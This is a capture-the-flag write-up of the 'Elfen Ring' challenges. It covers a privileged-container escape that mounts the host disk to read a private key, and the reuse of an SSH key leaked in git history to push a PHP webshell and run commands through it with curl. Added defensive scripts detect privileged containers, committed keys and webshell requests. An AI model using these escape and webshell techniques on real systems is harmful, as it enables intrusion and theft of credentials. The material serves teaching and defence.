Elfen Ring
The Elfen Ring path takes us into the CI/CD world and the problems that come with it.
Clone with a Different Tool
In this challenge we are tasked with cloning a public repo and providing the last word of its README.md file. We are given git clone git@haugfactory.com:asnowball/aws_scripts.git, which does not work. The goal is to switch from the ssh protocol to https and find the correct endpoint that hosts the repo. For this we can use the Google search below: haugfactory.com inurl:aws_scripts

Now we just need to clone this repo via HTTPS: git clone http://haugfactory.com/orcadmin/aws_scripts.git. Now that we have the correct repo we just need to cat the README.md file and provide its last word as input to the runtoanswer binary to complete the challenge.
Prison Escape
For the second challenge we are asked to escape a container and provide the hex string stored in /home/jailer/.ssh/jail.key.priv. This task also takes us to a second room.

At first this challenge might look really complicated, but it is not. First things first, let's check what permissions we have on the box; for that we run sudo -l

So we know that we can impersonate root, and for that we run sudo su -
Now we can start enumerating the container, and for that we will use deepce. Because we do not have internet access we just copy and paste the shell script over and run it like below: chmod +x ./deepce.sh and then ./deepce.sh > output.txt
Because the output of the tool has many blank lines we use sed to remove all empty lines: sed -r '/^\s*$/d' output.txt > output2.txt
To read the output more comfortably my personal preference is to use cat and more, like this: cat output2.txt | more. From it we can see that the container is being run in privileged mode. This grants the container root capabilities to all devices on the host system.

The next step is to list all disks visible from within the container; for that we run fdisk -l

We can see that we have a disk at /dev/vda. Now it is time to try to mount this disk from within the container; for that we run mount /dev/vda /tmp/test and validate the result by running ls /tmp/test

So we have successfully mounted the host disk from inside the container. The last step is to capture what we are looking for (/home/jailer/.ssh/jail.key.priv). For this we just need to run cat /tmp/test/home/jailer/.ssh/jail.key.priv
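The two signals that made this escape possible, a full effective capability set and host block devices reachable from inside the container, are both readable from /proc and /dev without any tooling. The script below is an added example (not part of this writeup and not deepce's code) that reproduces those two checks so they can be folded into a container baseline audit; the status and partitions files default to the live ones but can be pointed at saved copies, which is how the constructed samples at the bottom are used. The capability masks are the values the kernel prints for the full set on kernels with 38 and 41 capabilities respectively.

```shell
#!/bin/sh
# Added example: flag a privileged container and the host disks it can reach.

cap_mask_from_status() {
    # $1: a /proc/<pid>/status file (default: the current process).
    # Prints the CapEff hex mask, e.g. 00000000a80425fb for a default Docker container.
    awk '/^CapEff:/ { print $2 }' "${1:-/proc/self/status}"
}

mask_is_full() {
    # $1: CapEff mask. Returns 0 when every capability bit is set, which is what
    # docker run --privileged grants: 0000003fffffffff on kernels with caps 0..37,
    # 000001ffffffffff on kernels with caps 0..40.
    case "$1" in
        0000003fffffffff|000001ffffffffff) return 0 ;;
        *) return 1 ;;
    esac
}

classify_status_file() {
    # Prints "privileged" or "restricted" for the status file in $1.
    if mask_is_full "$(cap_mask_from_status "$1")"; then
        echo privileged
    else
        echo restricted
    fi
}

list_whole_disks() {
    # $1: a /proc/partitions-style file (default: the live one). Prints whole-disk
    # names (vda, sda, nvme0n1); partitions such as vda1 are skipped.
    awk 'NR > 2 && ($4 !~ /[0-9]$/ || $4 ~ /^nvme[0-9]+n[0-9]+$/) { print $4 }' \
        "${1:-/proc/partitions}"
}

disks_with_device_nodes() {
    # $1: partitions file, $2: device directory (default /dev). A disk that also has
    # a block device node under $2 is mountable from inside the container, which is
    # exactly the condition the mount /dev/vda step relies on. An unprivileged
    # container still sees the host's /proc/partitions but has no such nodes.
    for name in $(list_whole_disks "$1"); do
        [ -b "${2:-/dev}/$name" ] && echo "$name"
    done
    return 0
}

# Constructed sample inputs so the checks can be exercised outside a container.
sample_status_privileged() { printf 'Name:\tsh\nCapEff:\t000001ffffffffff\n'; }
sample_status_default()    { printf 'Name:\tsh\nCapEff:\t00000000a80425fb\n'; }
sample_partitions() {
    printf 'major minor  #blocks  name\n\n 254        0   20971520 vda\n 254        1   20970496 vda1\n'
}
```

Run inside a container as classify_status_file && disks_with_device_nodes; "privileged" together with a non-empty disk list is the combination that turns a container compromise into a host compromise, and is the finding to escalate regardless of what the workload inside does.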
Jolly CI/CD
After solving Prison Escape we can jump into Jolly CI/CD; with this a new hint is unlocked from Tinsel.

This hint is very valuable because it guides us through this challenge. Let's keep in mind the capital letters (WHOOPS!) and the GitLab location.
As in the previous challenge, we reviewed the local permissions and ran deepce.sh. After reviewing the output, this part was quite interesting:

The next question is: can we clone this repo? Let's give it a try with git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

Now that we were able to clone the repository we can look for the WHOOPS! commit and see what it contains. For that we run git log, which shows us the different commits.

In this case we are interested in the commit e19f653bde9ea3de6af21a587e41e7a909db1ca5. We can view its contents with git show e19f653bde9ea3de6af21a587e41e7a909db1ca5

We can see an OpenSSH key that was committed. One thing to keep in mind is that OpenSSH RSA keys are used not only to authenticate to systems but also, for example, to GitHub/GitLab. (This took me a long time to understand)
The next step is to add it to the ssh-agent. For that we run: eval "$(ssh-agent -s)" and then ssh-add id_rsa
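The WHOOPS! commit is the textbook case of a secret that survives in history: a later commit removing the file changes nothing, the key stays one git show away until it is rotated. The scan below is an added example (not part of this writeup, and not the project's or GitLab's tooling) that walks git log -p output and reports every commit and file that adds a private-key header, in the OpenSSH, RSA, EC and PKCS#8 forms. It is meant to be run as git log -p --all | scan_log_for_keys against a clone; here it is exercised on a constructed log so it runs without a repository, and the hashes and key body in that sample are placeholders.

```shell
#!/bin/sh
# Added example: find private keys committed anywhere in a repository's history.

scan_log_for_keys() {
    # Reads `git log -p` output on stdin (or from files given as arguments) and
    # prints "<commit> <file>" for each added line carrying a private-key header:
    #   -----BEGIN OPENSSH PRIVATE KEY-----   -----BEGIN RSA PRIVATE KEY-----
    #   -----BEGIN EC PRIVATE KEY-----        -----BEGIN PRIVATE KEY-----
    # Context and removed lines are ignored, so a commit that deletes a key is
    # not reported; the commit that introduced it still is.
    awk '
        /^commit [0-9a-f]+/                  { commit = $2 }
        /^\+\+\+ b\//                        { file = substr($0, 7) }
        /^\+.*-----BEGIN .*PRIVATE KEY-----/ { print commit, file }
    ' "$@"
}

sample_git_log() {
    # Constructed `git log -p` output: the older commit adds a key file, the newer
    # one only edits README.md. Hashes and the key body are placeholders.
    cat <<'EOF'
commit 2222222222222222222222222222222222222222
Author: Dev <dev@example.invalid>
Date:   Tue Dec 6 10:01:00 2022 +0000

    update readme

diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 wordpress.flag.net.internal
+deployed with the deploy key

commit 1111111111111111111111111111111111111111
Author: Dev <dev@example.invalid>
Date:   Tue Dec 6 10:00:00 2022 +0000

    whoops

diff --git a/.ssh/id_rsa b/.ssh/id_rsa
new file mode 100600
--- /dev/null
+++ b/.ssh/id_rsa
@@ -0,0 +1,3 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+PLACEHOLDERKEYBODYNOTAREALKEY
+-----END OPENSSH PRIVATE KEY-----
EOF
}
```

Every hit is a key to revoke on the server side (here, the GitLab deploy or user key), not merely a file to delete; rewriting history is optional clean-up, rotation is the fix. The same one-liner runs well as a pre-receive hook over the pushed range, where it stops the commit before it ever lands in the repository.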

Now that we have added the SSH key, the next step is to remove the old directory and clone the repository again with the new credentials. For that we run: git clone git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git

We know this is a WordPress site running PHP.

Now that we could download the repo via the SSH key we might also be able to push changes and achieve code execution. For that we create a webshell (we could create a reverse shell as well, but running a webshell and driving it via curl seems more interesting).
For this we create a file called shell.php with the following contents:
<?php system($_GET['cmd']); ?>
Now we just need to configure git, add the shell.php file and commit.

After all of this we need to push our changes with git push and validate the result.

Because our commands contain spaces we need to URL-encode them to be accepted. For example ls / is represented as ls%20%2F. By running ls / we find that the flag is in the root directory. The only thing remaining is to grab the flag with curl wordpress.flag.net.internal/shell.php?cmd=cat%20%2Fflag.txt
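From the web server's side every one of those curl calls is a GET to a .php resource with a cmd parameter, and the percent-encoding the text describes is exactly what hides the command from a naive grep. The script below is an added example (not part of this writeup) of the triage step a defender runs over the access log: it picks out requests that hand a cmd= parameter to a PHP file, decodes the %XX escapes the same way the server does, and prints client, path and the decoded command. The log lines at the bottom are constructed in the combined log format; the parameter name is only a starting point, since a webshell can use any name or a POST body, so the durable control is the one upstream of this, a deploy pipeline that cannot publish arbitrary files pushed with a leaked key.

```shell
#!/bin/sh
# Added example: spot webshell-style command parameters in an access log.

urldecode() {
    # Decode %XX escapes on stdin, e.g. ls%20%2F -> "ls /".
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    {
        s = $0; out = ""
        while ((i = index(s, "%")) > 0 && length(s) >= i + 2) {
            code = hexval(substr(s, i + 1, 1)) * 16 + hexval(substr(s, i + 2, 1))
            out = out substr(s, 1, i - 1) sprintf("%c", code)
            s = substr(s, i + 3)
        }
        print out s
    }'
}

find_cmd_requests() {
    # Reads combined-format access log lines on stdin. Field 7 is the request
    # path; a request to a .php resource whose query string carries cmd= is
    # printed as "<client> <path> <decoded command>".
    awk '$7 ~ /\.php[?](.*&)?cmd=/ { print $1, $7 }' |
    while read -r client url; do
        path=${url%%\?*}
        query=${url#*\?}
        cmd=$(printf '%s\n' "$query" | tr '&' '\n' | sed -n 's/^cmd=//p' | head -n 1 | urldecode)
        printf '%s %s %s\n' "$client" "$path" "$cmd"
    done
}

sample_access_log() {
    # Constructed log lines: one ordinary page view, two webshell requests.
    cat <<'EOF'
10.0.0.5 - - [06/Dec/2022:10:00:00 +0000] "GET /index.php?p=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Dec/2022:10:00:01 +0000] "GET /shell.php?cmd=ls%20%2F HTTP/1.1" 200 88 "-" "curl/7.85.0"
10.0.0.9 - - [06/Dec/2022:10:00:02 +0000] "GET /shell.php?cmd=cat%20%2Fflag.txt HTTP/1.1" 200 40 "-" "curl/7.85.0"
EOF
}
```

Run it as find_cmd_requests < /var/log/nginx/access.log (or the Apache equivalent); a single client issuing shell commands through a PHP file that was never part of the site's release is a high-confidence indicator, and the decoded commands tell you what was read or changed.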

